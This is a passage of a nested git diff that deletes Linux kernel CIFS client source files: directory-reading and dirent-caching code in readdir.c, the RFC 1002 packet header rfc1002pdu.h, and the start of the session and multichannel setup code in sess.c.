+-		pos_in_buf = index_to_find - first_entry_in_buffer;
+-		cifs_dbg(FYI, "found entry - pos_in_buf %d\n", pos_in_buf);
+-
+-		for (i = 0; (i < (pos_in_buf)) && (cur_ent != NULL); i++) {
+-			/* go entry by entry figuring out which is first */
+-			cur_ent = nxt_dir_entry(cur_ent, end_of_smb,
+-						cfile->srch_inf.info_level);
+-		}
+-		if ((cur_ent == NULL) && (i < pos_in_buf)) {
+-			/* BB fixme - check if we should flag this error */
+-			cifs_dbg(VFS, "reached end of buf searching for pos in buf %d index to find %lld rc %d\n",
+-				 pos_in_buf, index_to_find, rc);
+-		}
+-		rc = 0;
+-		*current_entry = cur_ent;
+-	} else {
+-		cifs_dbg(FYI, "index not in buffer - could not findnext into it\n");
+-		return 0;
+-	}
+-
+-	if (pos_in_buf >= cfile->srch_inf.entries_in_buffer) {
+-		cifs_dbg(FYI, "can not return entries pos_in_buf beyond last\n");
+-		*num_to_ret = 0;
+-	} else
+-		*num_to_ret = cfile->srch_inf.entries_in_buffer - pos_in_buf;
+-
+-	return rc;
+-}
+-
+-static bool emit_cached_dirents(struct cached_dirents *cde,
+-				struct dir_context *ctx)
+-{
+-	struct cached_dirent *dirent;
+-	bool rc;
+-
+-	list_for_each_entry(dirent, &cde->entries, entry) {
+-		/*
+-		 * Skip all early entries prior to the current lseek()
+-		 * position.
+-		 */
+-		if (ctx->pos > dirent->pos)
+-			continue;
+-		/*
+-		 * We recorded the current ->pos value for the dirent
+-		 * when we stored it in the cache.
+-		 * However, this sequence of ->pos values may have holes
+-		 * in it, for example because dot-dirs returned from the
+-		 * server are suppressed.
+-		 * Handle this by forcing ctx->pos to be the same as the
+-		 * ->pos of the current dirent we emit from the cache.
+-		 * This means that when we emit these entries from the cache
+-		 * we now emit them with the same ->pos value as in the
+-		 * initial scan.
+-		 */
+-		ctx->pos = dirent->pos;
+-		rc = dir_emit(ctx, dirent->name, dirent->namelen,
+-			      dirent->fattr.cf_uniqueid,
+-			      dirent->fattr.cf_dtype);
+-		if (!rc)
+-			return rc;
+-		ctx->pos++;
+-	}
+-	return true;
+-}
+-
+-static void update_cached_dirents_count(struct cached_dirents *cde,
+-					struct dir_context *ctx)
+-{
+-	if (cde->ctx != ctx)
+-		return;
+-	if (cde->is_valid || cde->is_failed)
+-		return;
+-
+-	cde->pos++;
+-}
+-
+-static void finished_cached_dirents_count(struct cached_dirents *cde,
+-					struct dir_context *ctx)
+-{
+-	if (cde->ctx != ctx)
+-		return;
+-	if (cde->is_valid || cde->is_failed)
+-		return;
+-	if (ctx->pos != cde->pos)
+-		return;
+-
+-	cde->is_valid = 1;
+-}
+-
+-static void add_cached_dirent(struct cached_dirents *cde,
+-			      struct dir_context *ctx,
+-			      const char *name, int namelen,
+-			      struct cifs_fattr *fattr)
+-{
+-	struct cached_dirent *de;
+-
+-	if (cde->ctx != ctx)
+-		return;
+-	if (cde->is_valid || cde->is_failed)
+-		return;
+-	if (ctx->pos != cde->pos) {
+-		cde->is_failed = 1;
+-		return;
+-	}
+-	de = kzalloc(sizeof(*de), GFP_ATOMIC);
+-	if (de == NULL) {
+-		cde->is_failed = 1;
+-		return;
+-	}
+-	de->namelen = namelen;
+-	de->name = kstrndup(name, namelen, GFP_ATOMIC);
+-	if (de->name == NULL) {
+-		kfree(de);
+-		cde->is_failed = 1;
+-		return;
+-	}
+-	de->pos = ctx->pos;
+-
+-	memcpy(&de->fattr, fattr, sizeof(struct cifs_fattr));
+-
+-	list_add_tail(&de->entry, &cde->entries);
+-}
+-
+-static bool cifs_dir_emit(struct dir_context *ctx,
+-			  const char *name, int namelen,
+-			  struct cifs_fattr *fattr,
+-			  struct cached_fid *cfid)
+-{
+-	bool rc;
+-	ino_t ino = cifs_uniqueid_to_ino_t(fattr->cf_uniqueid);
+-
+-	rc = dir_emit(ctx, name, namelen, ino, fattr->cf_dtype);
+-	if (!rc)
+-		return rc;
+-
+-	if (cfid) {
+-		mutex_lock(&cfid->dirents.de_mutex);
+-		add_cached_dirent(&cfid->dirents, ctx, name, namelen,
+-				  fattr);
+-		mutex_unlock(&cfid->dirents.de_mutex);
+-	}
+-
+-	return rc;
+-}
+-
+-static int cifs_filldir(char *find_entry, struct file *file,
+-			struct dir_context *ctx,
+-			char *scratch_buf, unsigned int max_len,
+-			struct cached_fid *cfid)
+-{
+-	struct cifsFileInfo *file_info = file->private_data;
+-	struct super_block *sb = file_inode(file)->i_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_dirent de = { NULL, };
+-	struct cifs_fattr fattr;
+-	struct qstr name;
+-	int rc = 0;
+-
+-	rc = cifs_fill_dirent(&de, find_entry, file_info->srch_inf.info_level,
+-			      file_info->srch_inf.unicode);
+-	if (rc)
+-		return rc;
+-
+-	if (de.namelen > max_len) {
+-		cifs_dbg(VFS, "bad search response length %zd past smb end\n",
+-			 de.namelen);
+-		return -EINVAL;
+-	}
+-
+-	/* skip . and .. since we added them first */
+-	if (cifs_entry_is_dot(&de, file_info->srch_inf.unicode))
+-		return 0;
+-
+-	if (file_info->srch_inf.unicode) {
+-		struct nls_table *nlt = cifs_sb->local_nls;
+-		int map_type;
+-
+-		map_type = cifs_remap(cifs_sb);
+-		name.name = scratch_buf;
+-		name.len =
+-			cifs_from_utf16((char *)name.name, (__le16 *)de.name,
+-					UNICODE_NAME_MAX,
+-					min_t(size_t, de.namelen,
+-					      (size_t)max_len), nlt, map_type);
+-		name.len -= nls_nullsize(nlt);
+-	} else {
+-		name.name = de.name;
+-		name.len = de.namelen;
+-	}
+-
+-	switch (file_info->srch_inf.info_level) {
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		cifs_posix_to_fattr(&fattr,
+-				    (struct smb2_posix_info *)find_entry,
+-				    cifs_sb);
+-		break;
+-	case SMB_FIND_FILE_UNIX:
+-		cifs_unix_basic_to_fattr(&fattr,
+-					 &((FILE_UNIX_INFO *)find_entry)->basic,
+-					 cifs_sb);
+-		if (S_ISLNK(fattr.cf_mode))
+-			fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
+-		break;
+-	case SMB_FIND_FILE_INFO_STANDARD:
+-		cifs_std_info_to_fattr(&fattr,
+-				       (FIND_FILE_STANDARD_INFO *)find_entry,
+-				       cifs_sb);
+-		break;
+-	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		cifs_fulldir_info_to_fattr(&fattr,
+-					   (SEARCH_ID_FULL_DIR_INFO *)find_entry,
+-					   cifs_sb);
+-		break;
+-	default:
+-		cifs_dir_info_to_fattr(&fattr,
+-				       (FILE_DIRECTORY_INFO *)find_entry,
+-				       cifs_sb);
+-		break;
+-	}
+-
+-	if (de.ino && (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
+-		fattr.cf_uniqueid = de.ino;
+-	} else {
+-		fattr.cf_uniqueid = iunique(sb, ROOT_I);
+-		cifs_autodisable_serverino(cifs_sb);
+-	}
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) &&
+-	    couldbe_mf_symlink(&fattr))
+-		/*
+-		 * trying to get the type and mode can be slow,
+-		 * so just treat those as regular files for now, and
+-		 * mark them for reval
+-		 */
+-		fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
+-
+-	cifs_prime_dcache(file_dentry(file), &name, &fattr);
+-
+-	return !cifs_dir_emit(ctx, name.name, name.len,
+-			      &fattr, cfid);
+-}
+-
+-
+-int cifs_readdir(struct file *file, struct dir_context *ctx)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	int i;
+-	struct tcon_link *tlink = NULL;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cifsFile;
+-	char *current_entry;
+-	int num_to_fill = 0;
+-	char *tmp_buf = NULL;
+-	char *end_of_smb;
+-	unsigned int max_len;
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	struct cached_fid *cfid = NULL;
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-
+-	xid = get_xid();
+-
+-	full_path = build_path_from_dentry(file_dentry(file), page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto rddir2_exit;
+-	}
+-
+-	if (file->private_data == NULL) {
+-		tlink = cifs_sb_tlink(cifs_sb);
+-		if (IS_ERR(tlink))
+-			goto cache_not_found;
+-		tcon = tlink_tcon(tlink);
+-	} else {
+-		cifsFile = file->private_data;
+-		tcon = tlink_tcon(cifsFile->tlink);
+-	}
+-
+-	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
+-	cifs_put_tlink(tlink);
+-	if (rc)
+-		goto cache_not_found;
+-
+-	mutex_lock(&cfid->dirents.de_mutex);
+-	/*
+-	 * If this was a read from the start of the directory,
+-	 * we need to initialize scanning and storing of the
+-	 * directory content.
+-	 */
+-	if (ctx->pos == 0 && cfid->dirents.ctx == NULL) {
+-		cfid->dirents.ctx = ctx;
+-		cfid->dirents.pos = 2;
+-	}
+-	/*
+-	 * If we already have the entire directory cached then
+-	 * we can just serve the cache.
+-	 */
+-	if (cfid->dirents.is_valid) {
+-		if (!dir_emit_dots(file, ctx)) {
+-			mutex_unlock(&cfid->dirents.de_mutex);
+-			goto rddir2_exit;
+-		}
+-		emit_cached_dirents(&cfid->dirents, ctx);
+-		mutex_unlock(&cfid->dirents.de_mutex);
+-		goto rddir2_exit;
+-	}
+-	mutex_unlock(&cfid->dirents.de_mutex);
+-
+-	/* Drop the cache while calling initiate_cifs_search and
+-	 * find_cifs_entry, in case there are reconnects during
+-	 * query_directory.
+-	 */
+-	close_cached_dir(cfid);
+-	cfid = NULL;
+-
+- cache_not_found:
+-	/*
+-	 * Ensure FindFirst doesn't fail before doing filldir() for '.' and
+-	 * '..'. Otherwise we won't be able to notify VFS in case of failure.
+-	 */
+-	if (file->private_data == NULL) {
+-		rc = initiate_cifs_search(xid, file, full_path);
+-		cifs_dbg(FYI, "initiate cifs search rc %d\n", rc);
+-		if (rc)
+-			goto rddir2_exit;
+-	}
+-
+-	if (!dir_emit_dots(file, ctx))
+-		goto rddir2_exit;
+-
+-	/* 1) If the search is active,
+-		is the position in the current search buffer?
+-		if it is before, then restart the search
+-		if it is after, then keep searching till we find it */
+-	cifsFile = file->private_data;
+-	if (cifsFile->srch_inf.endOfSearch) {
+-		if (cifsFile->srch_inf.emptyDir) {
+-			cifs_dbg(FYI, "End of search, empty dir\n");
+-			rc = 0;
+-			goto rddir2_exit;
+-		}
+-	} /* else {
+-		cifsFile->invalidHandle = true;
+-		tcon->ses->server->close(xid, tcon, &cifsFile->fid);
+-	} */
+-
+-	tcon = tlink_tcon(cifsFile->tlink);
+-	rc = find_cifs_entry(xid, tcon, ctx->pos, file, full_path,
+-			     &current_entry, &num_to_fill);
+-	open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
+-	if (rc) {
+-		cifs_dbg(FYI, "fce error %d\n", rc);
+-		goto rddir2_exit;
+-	} else if (current_entry != NULL) {
+-		cifs_dbg(FYI, "entry %lld found\n", ctx->pos);
+-	} else {
+-		if (cfid) {
+-			mutex_lock(&cfid->dirents.de_mutex);
+-			finished_cached_dirents_count(&cfid->dirents, ctx);
+-			mutex_unlock(&cfid->dirents.de_mutex);
+-		}
+-		cifs_dbg(FYI, "Could not find entry\n");
+-		goto rddir2_exit;
+-	}
+-	cifs_dbg(FYI, "loop through %d times filling dir for net buf %p\n",
+-		 num_to_fill, cifsFile->srch_inf.ntwrk_buf_start);
+-	max_len = tcon->ses->server->ops->calc_smb_size(
+-			cifsFile->srch_inf.ntwrk_buf_start);
+-	end_of_smb = cifsFile->srch_inf.ntwrk_buf_start + max_len;
+-
+-	tmp_buf = kmalloc(UNICODE_NAME_MAX, GFP_KERNEL);
+-	if (tmp_buf == NULL) {
+-		rc = -ENOMEM;
+-		goto rddir2_exit;
+-	}
+-
+-	for (i = 0; i < num_to_fill; i++) {
+-		if (current_entry == NULL) {
+-			/* evaluate whether this case is an error */
+-			cifs_dbg(VFS, "past SMB end,  num to fill %d i %d\n",
+-				 num_to_fill, i);
+-			break;
+-		}
+-		/*
+-		 * if a buggy server returns . and .. late, do we want to
+-		 * check for that here?
+-		 */
+-		*tmp_buf = 0;
+-		rc = cifs_filldir(current_entry, file, ctx,
+-				  tmp_buf, max_len, cfid);
+-		if (rc) {
+-			if (rc > 0)
+-				rc = 0;
+-			break;
+-		}
+-
+-		ctx->pos++;
+-		if (cfid) {
+-			mutex_lock(&cfid->dirents.de_mutex);
+-			update_cached_dirents_count(&cfid->dirents, ctx);
+-			mutex_unlock(&cfid->dirents.de_mutex);
+-		}
+-
+-		if (ctx->pos ==
+-			cifsFile->srch_inf.index_of_last_entry) {
+-			cifs_dbg(FYI, "last entry in buf at pos %lld %s\n",
+-				 ctx->pos, tmp_buf);
+-			cifs_save_resume_key(current_entry, cifsFile);
+-			break;
+-		}
+-		current_entry =
+-			nxt_dir_entry(current_entry, end_of_smb,
+-				      cifsFile->srch_inf.info_level);
+-	}
+-	kfree(tmp_buf);
+-
+-rddir2_exit:
+-	if (cfid)
+-		close_cached_dir(cfid);
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	return rc;
+-}
+diff --git a/fs/cifs/rfc1002pdu.h b/fs/cifs/rfc1002pdu.h
+deleted file mode 100644
+index ae1d025da294a..0000000000000
+--- a/fs/cifs/rfc1002pdu.h
++++ /dev/null
+@@ -1,61 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Protocol Data Unit definitions for RFC 1001/1002 support
+- *
+- *   Copyright (c) International Business Machines  Corp., 2004
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-/* NB: unlike smb/cifs packets, the RFC1002 structures are big endian */
+-
+-	/* RFC 1002 session packet types */
+-#define RFC1002_SESSION_MESSAGE 0x00
+-#define RFC1002_SESSION_REQUEST  0x81
+-#define RFC1002_POSITIVE_SESSION_RESPONSE 0x82
+-#define RFC1002_NEGATIVE_SESSION_RESPONSE 0x83
+-#define RFC1002_RETARGET_SESSION_RESPONSE 0x84
+-#define RFC1002_SESSION_KEEP_ALIVE 0x85
+-
+-	/* RFC 1002 flags (only one defined) */
+-#define RFC1002_LENGTH_EXTEND 0x80 /* high order bit of length (ie +64K) */
+-
+-struct rfc1002_session_packet {
+-	__u8	type;
+-	__u8	flags;
+-	__u16	length;
+-	union {
+-		struct {
+-			__u8 called_len;
+-			__u8 called_name[32];
+-			__u8 scope1; /* null */
+-			__u8 calling_len;
+-			__u8 calling_name[32];
+-			__u8 scope2; /* null */
+-		} __attribute__((packed)) session_req;
+-		struct {
+-			__u32 retarget_ip_addr;
+-			__u16 port;
+-		} __attribute__((packed)) retarget_resp;
+-		__u8 neg_ses_resp_error_code;
+-		/* The POSITIVE_SESSION_RESPONSE packet does not include a trailer.
+-		The SESSION_KEEP_ALIVE packet also does not include a trailer.
+-		The trailer for the SESSION_MESSAGE packet is the SMB/CIFS header */
+-	} __attribute__((packed)) trailer;
+-} __attribute__((packed));
+-
+-/* Negative Session Response error codes */
+-#define RFC1002_NOT_LISTENING_CALLED  0x80 /* not listening on called name */
+-#define RFC1002_NOT_LISTENING_CALLING 0x81 /* not listening on calling name */
+-#define RFC1002_NOT_PRESENT           0x82 /* called name not present */
+-#define RFC1002_INSUFFICIENT_RESOURCE 0x83
+-#define RFC1002_UNSPECIFIED_ERROR     0x8F
+-
+-/* RFC 1002 Datagram service packets are not defined here as they
+-are not needed for the network filesystem client unless we plan on
+-implementing broadcast resolution of the server ip address (from
+-server netbios name). Currently, server names are resolved only via DNS
+-(tcp name), ip address, or an /etc/hosts equivalent mapping to ip address.*/
+-
+-#define DEFAULT_CIFS_CALLED_NAME  "*SMBSERVER      "
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+deleted file mode 100644
+index 81be17845072a..0000000000000
+--- a/fs/cifs/sess.c
++++ /dev/null
+@@ -1,1858 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   SMB/CIFS session setup handling routines
+- *
+- *   Copyright (c) International Business Machines  Corp., 2006, 2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "ntlmssp.h"
+-#include "nterr.h"
+-#include <linux/utsname.h>
+-#include <linux/slab.h>
+-#include <linux/version.h>
+-#include "cifsfs.h"
+-#include "cifs_spnego.h"
+-#include "smb2proto.h"
+-#include "fs_context.h"
+-
+-static int
+-cifs_ses_add_channel(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
+-		     struct cifs_server_iface *iface);
+-
+-bool
+-is_server_using_iface(struct TCP_Server_Info *server,
+-		      struct cifs_server_iface *iface)
+-{
+-	struct sockaddr_in *i4 = (struct sockaddr_in *)&iface->sockaddr;
+-	struct sockaddr_in6 *i6 = (struct sockaddr_in6 *)&iface->sockaddr;
+-	struct sockaddr_in *s4 = (struct sockaddr_in *)&server->dstaddr;
+-	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *)&server->dstaddr;
+-
+-	if (server->dstaddr.ss_family != iface->sockaddr.ss_family)
+-		return false;
+-	if (server->dstaddr.ss_family == AF_INET) {
+-		if (s4->sin_addr.s_addr != i4->sin_addr.s_addr)
+-			return false;
+-	} else if (server->dstaddr.ss_family == AF_INET6) {
+-		if (memcmp(&s6->sin6_addr, &i6->sin6_addr,
+-			   sizeof(i6->sin6_addr)) != 0)
+-			return false;
+-	} else {
+-		/* unknown family.. */
+-		return false;
+-	}
+-	return true;
+-}
+-
+-bool is_ses_using_iface(struct cifs_ses *ses, struct cifs_server_iface *iface)
+-{
+-	int i;
+-
+-	spin_lock(&ses->chan_lock);
+-	for (i = 0; i < ses->chan_count; i++) {
+-		if (ses->chans[i].iface == iface) {
+-			spin_unlock(&ses->chan_lock);
+-			return true;
+-		}
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	return false;
+-}
+-
+-/* channel helper functions. it is assumed that chan_lock is held by the caller. */
+-
+-unsigned int
+-cifs_ses_get_chan_index(struct cifs_ses *ses,
+-			struct TCP_Server_Info *server)
+-{
+-	unsigned int i;
+-
+-	for (i = 0; i < ses->chan_count; i++) {
+-		if (ses->chans[i].server == server)
+-			return i;
+-	}
+-
+-	/* If we didn't find the channel, it is likely a bug */
+-	if (server)
+-		cifs_dbg(VFS, "unable to get chan index for server: 0x%llx",
+-			 server->conn_id);
+-	WARN_ON(1);
+-	return 0;
+-}
+-
+-void
+-cifs_chan_set_in_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	ses->chans[chan_index].in_reconnect = true;
+-}
+-
+-void
+-cifs_chan_clear_in_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	ses->chans[chan_index].in_reconnect = false;
+-}
+-
+-bool
+-cifs_chan_in_reconnect(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	return CIFS_CHAN_IN_RECONNECT(ses, chan_index);
+-}
+-
+-void
+-cifs_chan_set_need_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	set_bit(chan_index, &ses->chans_need_reconnect);
+-	cifs_dbg(FYI, "Set reconnect bitmask for chan %u; now 0x%lx\n",
+-		 chan_index, ses->chans_need_reconnect);
+-}
+-
+-void
+-cifs_chan_clear_need_reconnect(struct cifs_ses *ses,
+-			       struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	clear_bit(chan_index, &ses->chans_need_reconnect);
+-	cifs_dbg(FYI, "Cleared reconnect bitmask for chan %u; now 0x%lx\n",
+-		 chan_index, ses->chans_need_reconnect);
+-}
+-
+-bool
+-cifs_chan_needs_reconnect(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	return CIFS_CHAN_NEEDS_RECONNECT(ses, chan_index);
+-}
+-
+-bool
+-cifs_chan_is_iface_active(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	return ses->chans[chan_index].iface &&
+-		ses->chans[chan_index].iface->is_active;
+-}
+-
+-/* returns number of channels added */
+-int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+-{
+-	struct TCP_Server_Info *server = ses->server;
+-	int old_chan_count, new_chan_count;
+-	int left;
+-	int rc = 0;
+-	int tries = 0;
+-	struct cifs_server_iface *iface = NULL, *niface = NULL;
+-
+-	spin_lock(&ses->chan_lock);
+-
+-	new_chan_count = old_chan_count = ses->chan_count;
+-	left = ses->chan_max - ses->chan_count;
+-
+-	if (left <= 0) {
+-		spin_unlock(&ses->chan_lock);
+-		cifs_dbg(FYI,
+-			 "ses already at max_channels (%zu), nothing to open\n",
+-			 ses->chan_max);
+-		return 0;
+-	}
+-
+-	if (server->dialect < SMB30_PROT_ID) {
+-		spin_unlock(&ses->chan_lock);
+-		cifs_dbg(VFS, "multichannel is not supported on this protocol version, use 3.0 or above\n");
+-		return 0;
+-	}
+-
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+-		ses->chan_max = 1;
+-		spin_unlock(&ses->chan_lock);
+-		cifs_server_dbg(VFS, "no multichannel support\n");
+-		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	/*
+-	 * Keep connecting to the same, fastest iface for all channels as
+-	 * long as it is RSS-capable. Try the next fastest one if it is not
+-	 * RSS-capable or channel creation fails.
+-	 */
+-	spin_lock(&ses->iface_lock);
+-	iface = list_first_entry(&ses->iface_list, struct cifs_server_iface,
+-				 iface_head);
+-	spin_unlock(&ses->iface_lock);
+-
+-	while (left > 0) {
+-
+-		tries++;
+-		if (tries > 3*ses->chan_max) {
+-			cifs_dbg(FYI, "too many channel open attempts (%d channels left to open)\n",
+-				 left);
+-			break;
+-		}
+-
+-		spin_lock(&ses->iface_lock);
+-		if (!ses->iface_count) {
+-			spin_unlock(&ses->iface_lock);
+-			break;
+-		}
+-
+-		list_for_each_entry_safe_from(iface, niface, &ses->iface_list,
+-				    iface_head) {
+-			/* skip ifaces that are unusable */
+-			if (!iface->is_active ||
+-			    (is_ses_using_iface(ses, iface) &&
+-			     !iface->rss_capable)) {
+-				continue;
+-			}
+-
+-			/* take ref before unlock */
+-			kref_get(&iface->refcount);
+-
+-			spin_unlock(&ses->iface_lock);
+-			rc = cifs_ses_add_channel(cifs_sb, ses, iface);
+-			spin_lock(&ses->iface_lock);
+-
+-			if (rc) {
+-				cifs_dbg(VFS, "failed to open extra channel on iface:%pIS rc=%d\n",
+-					 &iface->sockaddr,
+-					 rc);
+-				kref_put(&iface->refcount, release_iface);
+-				continue;
+-			}
+-
+-			cifs_dbg(FYI, "successfully opened new channel on iface:%pIS\n",
+-				 &iface->sockaddr);
+-			break;
+-		}
+-		spin_unlock(&ses->iface_lock);
+-
+-		left--;
+-		new_chan_count++;
+-	}
+-
+-	return new_chan_count - old_chan_count;
+-}
+-
+-/*
+- * update the iface for the channel if necessary.
+- * will return 0 when the iface is updated, 1 if removed or left unchanged.
+- * chan_lock is taken internally, so it must not be held by the caller.
+- */
+-int
+-cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index;
+-	struct cifs_server_iface *iface = NULL;
+-	struct cifs_server_iface *old_iface = NULL;
+-	int rc = 0;
+-
+-	spin_lock(&ses->chan_lock);
+-	chan_index = cifs_ses_get_chan_index(ses, server);
+-	if (!chan_index) {
+-		spin_unlock(&ses->chan_lock);
+-		return 0;
+-	}
+-
+-	if (ses->chans[chan_index].iface) {
+-		old_iface = ses->chans[chan_index].iface;
+-		if (old_iface->is_active) {
+-			spin_unlock(&ses->chan_lock);
+-			return 1;
+-		}
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	spin_lock(&ses->iface_lock);
+-	/* then look for a new one */
+-	list_for_each_entry(iface, &ses->iface_list, iface_head) {
+-		if (!iface->is_active ||
+-		    (is_ses_using_iface(ses, iface) &&
+-		     !iface->rss_capable)) {
+-			continue;
+-		}
+-		kref_get(&iface->refcount);
+-		break;
+-	}
+-
+-	if (list_entry_is_head(iface, &ses->iface_list, iface_head)) {
+-		rc = 1;
+-		iface = NULL;
+-		cifs_dbg(FYI, "unable to find a suitable iface\n");
+-	}
+-
+-	/* now drop the ref to the current iface */
+-	if (old_iface && iface) {
+-		cifs_dbg(FYI, "replacing iface: %pIS with %pIS\n",
+-			 &old_iface->sockaddr,
+-			 &iface->sockaddr);
+-		kref_put(&old_iface->refcount, release_iface);
+-	} else if (old_iface) {
+-		cifs_dbg(FYI, "releasing ref to iface: %pIS\n",
+-			 &old_iface->sockaddr);
+-		kref_put(&old_iface->refcount, release_iface);
+-	} else {
+-		WARN_ON(!iface);
+-		cifs_dbg(FYI, "adding new iface: %pIS\n", &iface->sockaddr);
+-	}
+-	spin_unlock(&ses->iface_lock);
+-
+-	spin_lock(&ses->chan_lock);
+-	chan_index = cifs_ses_get_chan_index(ses, server);
+-	ses->chans[chan_index].iface = iface;
+-
+-	/* No iface was found. If this is a secondary chan, drop the connection */
+-	if (!iface && CIFS_SERVER_IS_CHAN(server))
+-		ses->chans[chan_index].server = NULL;
+-
+-	spin_unlock(&ses->chan_lock);
+-
+-	if (!iface && CIFS_SERVER_IS_CHAN(server))
+-		cifs_put_tcp_session(server, false);
+-
+-	return rc;
+-}
+-
+-/*
+- * If server is a channel of ses, return the corresponding enclosing
+- * cifs_chan otherwise return NULL.
+- */
+-struct cifs_chan *
+-cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server)
+-{
+-	int i;
+-
+-	spin_lock(&ses->chan_lock);
+-	for (i = 0; i < ses->chan_count; i++) {
+-		if (ses->chans[i].server == server) {
+-			spin_unlock(&ses->chan_lock);
+-			return &ses->chans[i];
+-		}
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	return NULL;
+-}
+-
+-static int
+-cifs_ses_add_channel(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
+-		     struct cifs_server_iface *iface)
+-{
+-	struct TCP_Server_Info *chan_server;
+-	struct cifs_chan *chan;
+-	struct smb3_fs_context ctx = {NULL};
+-	static const char unc_fmt[] = "\\%s\\foo";
+-	char unc[sizeof(unc_fmt)+SERVER_NAME_LEN_WITH_NULL] = {0};
+-	struct sockaddr_in *ipv4 = (struct sockaddr_in *)&iface->sockaddr;
+-	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&iface->sockaddr;
+-	int rc;
+-	unsigned int xid = get_xid();
+-
+-	if (iface->sockaddr.ss_family == AF_INET)
+-		cifs_dbg(FYI, "adding channel to ses %p (speed:%zu bps rdma:%s ip:%pI4)\n",
+-			 ses, iface->speed, iface->rdma_capable ? "yes" : "no",
+-			 &ipv4->sin_addr);
+-	else
+-		cifs_dbg(FYI, "adding channel to ses %p (speed:%zu bps rdma:%s ip:%pI6)\n",
+-			 ses, iface->speed, iface->rdma_capable ? "yes" : "no",
+-			 &ipv6->sin6_addr);
+-
+-	/*
+-	 * Setup a ctx with mostly the same info as the existing
+-	 * session and overwrite it with the requested iface data.
+-	 *
+-	 * We need to setup at least the fields used for negprot and
+-	 * sesssetup.
+-	 *
+-	 * We only need the ctx here, so we can reuse memory from
+-	 * the session and server without caring about memory
+-	 * management.
+-	 */
+-
+-	/* Always make new connection for now (TODO?) */
+-	ctx.nosharesock = true;
+-
+-	/* Auth */
+-	ctx.domainauto = ses->domainAuto;
+-	ctx.domainname = ses->domainName;
+-
+-	/* no hostname for extra channels */
+-	ctx.server_hostname = "";
+-
+-	ctx.username = ses->user_name;
+-	ctx.password = ses->password;
+-	ctx.sectype = ses->sectype;
+-	ctx.sign = ses->sign;
+-
+-	/* UNC and paths */
+-	/* XXX: Use ses->server->hostname? */
+-	sprintf(unc, unc_fmt, ses->ip_addr);
+-	ctx.UNC = unc;
+-	ctx.prepath = "";
+-
+-	/* Reuse same version as master connection */
+-	ctx.vals = ses->server->vals;
+-	ctx.ops = ses->server->ops;
+-
+-	ctx.noblocksnd = ses->server->noblocksnd;
+-	ctx.noautotune = ses->server->noautotune;
+-	ctx.sockopt_tcp_nodelay = ses->server->tcp_nodelay;
+-	ctx.echo_interval = ses->server->echo_interval / HZ;
+-	ctx.max_credits = ses->server->max_credits;
+-
+-	/*
+-	 * This will be used for encoding/decoding user/domain/pw
+-	 * during sess setup auth.
+-	 */
+-	ctx.local_nls = cifs_sb->local_nls;
+-
+-	/* Use RDMA if possible */
+-	ctx.rdma = iface->rdma_capable;
+-	memcpy(&ctx.dstaddr, &iface->sockaddr, sizeof(struct sockaddr_storage));
+-
+-	/* reuse master con client guid */
+-	memcpy(&ctx.client_guid, ses->server->client_guid,
+-	       SMB2_CLIENT_GUID_SIZE);
+-	ctx.use_client_guid = true;
+-
+-	chan_server = cifs_get_tcp_session(&ctx, ses->server);
+-
+-	spin_lock(&ses->chan_lock);
+-	chan = &ses->chans[ses->chan_count];
+-	chan->server = chan_server;
+-	if (IS_ERR(chan->server)) {
